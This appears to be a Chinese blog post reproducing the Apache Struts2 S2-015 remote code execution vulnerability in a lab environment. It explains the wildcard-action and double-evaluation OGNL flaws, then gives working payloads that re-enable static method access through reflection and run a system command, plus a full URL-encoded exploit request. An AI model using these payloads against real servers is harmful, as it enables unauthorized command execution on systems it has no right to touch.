2. 程式人生 > 其它 >S2-015 遠端程式碼執行漏洞

S2-015 遠端程式碼執行漏洞

阿新 發佈:2022-05-18

影響版本: 2.0.0 - 2.3.14.2

漏洞詳情:

測試環境搭建

docker-compose build
docker-compose up -d

原理與測試

漏洞產生於配置了 Action 萬用字元 *,並將其作為動態值時,解析時會將其內容執行 OGNL 表示式,例如:

<package name="S2-015" extends="struts-default">
    <action name="*" class="com.demo.action.PageAction">
        <result>/{1}.jsp</result>
    </action>
</package>

上述配置能讓我們訪問 name.action 時使用 name.jsp 來渲染頁面,但是在提取 name 並解析時,對其執行了 OGNL 表示式解析,所以導致命令執行。在實踐復現的時候發現,由於 name 值的位置比較特殊,一些特殊的字元如 / " \ 都無法使用(轉義也不行),所以在利用該點進行遠端命令執行時一些帶有路徑的命令可能無法執行成功。

還有需要說明的就是在 Struts 2.3.14.1 - Struts 2.3.14.2 的更新內容中,刪除了 SecurityMemberAccess 類中的 setAllowStaticMethodAccess 方法,因此在 2.3.14.2 版本以後都不能直接通過 #_memberAccess['allowStaticMethodAccess']=true

 來修改其值達到重獲靜態方法呼叫的能力。

這裡為了到達執行命令的目的可以用 kxlzx 提到的呼叫動態方法 (new java.lang.ProcessBuilder('calc')).start() 來解決,另外還可以藉助 Java 反射機制去間接修改:

#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true)

可以構造 Payload 如下:

${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#[email protected]@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream()),#q}

直接回顯

除了上面所說到的這種情況以外,S2-015 還涉及一種二次引用執行的情況:

<action name="param" class="com.demo.action.ParamAction">
    <result name="success" type="httpheader">
        <param name="error">305</param>
        <param name="headers.fxxk">${message}</param>
    </result>
</action>

這裡配置了 <param name="errorMessage">${message}</param>,其中 message 為 ParamAction 中的一個私有變數,這樣配置會導致觸發該 Result 時,Struts2 會從請求引數中獲取 message 的值,並在解析過程中,觸發了 OGNL 表示式執行,因此只用提交 %{1111*2} 作為其變數值提交就會得到執行。這裡需要注意的是這裡的二次解析是因為在 struts.xml 中使用 ${param} 引用了 Action 中的變數所導致的,並不針對於 type="httpheader" 這種返回方式。

漏洞復現

下載好環境之後訪問ip+8080埠

輸入/${1+1}.action
發現表示式被執行,證明存在漏洞

將要執行的EXP進行URL編碼

GET /%24%7B%23context['xwork.MethodAccessor.denyMethodExecution']%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%[email protected]@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())%2C%23q%7D.action HTTP/1.1
Host: 192.168.10.128:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

相關推薦

S2-015 遠端程式碼執行漏洞

影響版本: 2.0.0 - 2.3.14.2 漏洞詳情: http://struts.apache.org/docs/s2-015.html 測試環境搭建

Apache Struts2 S2-013遠端程式碼執行漏洞復現

墨者學院開的靶場 進入環境 Struts2-013好傢伙,框架直接寫臉上,怕人看不出來= =

S2-001 遠端程式碼執行漏洞

原理 參考:http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html

S2-009 遠端程式碼執行漏洞

影響版本: 2.1.0 - 2.3.1.1 漏洞詳情:http://struts.apache.org/docs/s2-009.html 測試環境搭建

S2-012 遠端程式碼執行漏洞

影響版本: 2.1.0 - 2.3.13 漏洞詳情:http://struts.apache.org/docs/s2-012.html 測試環境搭建

S2-013/S2-014 遠端程式碼執行漏洞

影響版本: 2.0.0 - 2.3.14.1 漏洞詳情: http://struts.apache.org/docs/s2-013.html http://struts.apache.org/docs/s2-014.html

S2-032 遠端程式碼執行漏洞(CVE-2016-3081)

影響版本: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3) 漏洞詳情: https://cwiki.apache.org/confluence/display/WW/S2-032

S2-046 遠端程式碼執行漏洞(CVE-2017-5638)

影響版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 漏洞詳情: https://cwiki.apache.org/confluence/display/WW/S2-046

Struts2 S2-059 遠端程式碼執行漏洞(CVE-2019-0230)

Apache Struts框架, 會對某些特定的標籤的屬性值,比如id屬性進行二次解析,所以攻擊者可以傳遞將在呈現標籤屬性時再次解析的OGNL表示式,造成OGNL表示式注入。從而可能造成遠端執行程式碼

S2-057 遠端程式碼執行漏洞(CVE-2018-11776)

影響版本:<=Struts 2.3.34,Struts 2.5.16 漏洞詳情: https://cwiki.apache.org/confluence/display/WW/S2-057

Apache Struts2遠端程式碼執行漏洞(S2-015)

Apache Struts2遠端程式碼執行漏洞(S2-015)介紹 Apache Struts 2是用於開發JavaEE Web應用程式的開源Web應用框架。Apache Struts 2.0.0至2.3.14.2版本中存在遠端命令執行漏洞遠端攻擊者可藉助帶有‘${}’和‘%{}’

S2-052(CVE-2017-9805) 遠端程式碼執行漏洞復現

0x01 漏洞說明 漏洞編號:CVE-2017-9805(S2-052)影響版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12漏洞詳情:http://struts.apache.org/docs/s2-052.html

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現 漏洞介紹 F5 BIG-IP 是美國 F5 公司的一款集成了網路流量管理、應用程式安全管理、負載均衡等功能的應用交付平臺。

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現 漏洞介紹 F5 BIG-IP 是美國 F5 公司的一款集成了網路流量管理、應用程式安全管理、負載均衡等功能的應用交付平臺。

F5 BIG-IP 遠端程式碼執行漏洞復現(CVE-2020-5902)

0x01 漏洞詳情 F5 BIG-IP 是美國F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

CVE-2020-0674 IE遠端程式碼執行漏洞

0x00 漏洞描述 該漏洞影響元件為jscript.dll,該動態連結庫是微軟Internet Explorer瀏覽器的Javascript引擎之一,其中IE8及以下使用jscript.dll,IE9及以上預設使用jscript9.dll,但網頁可以通過《script》標籤指定

Joomla-3.4.6遠端程式碼執行漏洞復現

#01 Joomla簡介 Joomla!是一套自由、開放原始碼的內容管理系統,以PHP撰寫,用於釋出內容在全球資訊網與內部網,通常被用來搭建商業網站、個人部落格、資訊管理系統、Web 服務等,還可以進行二次開發以擴充使用範圍。

Jenkins-CI 遠端程式碼執行漏洞復現(CVE-2017-1000353)

0x01 環境 使用vulhub搭建漏洞環境 /vulhub-master/jenkins/CVE-2017-1000353 http://192.168.255.130:8080/

bolt cms V3.7.0 xss和遠端程式碼執行漏洞

本文首發於“合天智匯”公眾號 作者:ordar123 宣告:筆者初衷用於分享與普及網路知識,若讀者因此作出任何危害網路安全行為後果自負,與合天智匯及原作者無關!

Struts2 devMode導致遠端程式碼執行漏洞

轉載自https://blog.csdn.net/qq_29277155/article/details/51959041 簡介 Struts 2具有一個稱為devMode(=開發模式)的設定(可以在struts.properties中將其設定為true或false)。啟用此設定後,Struts 2將提供其他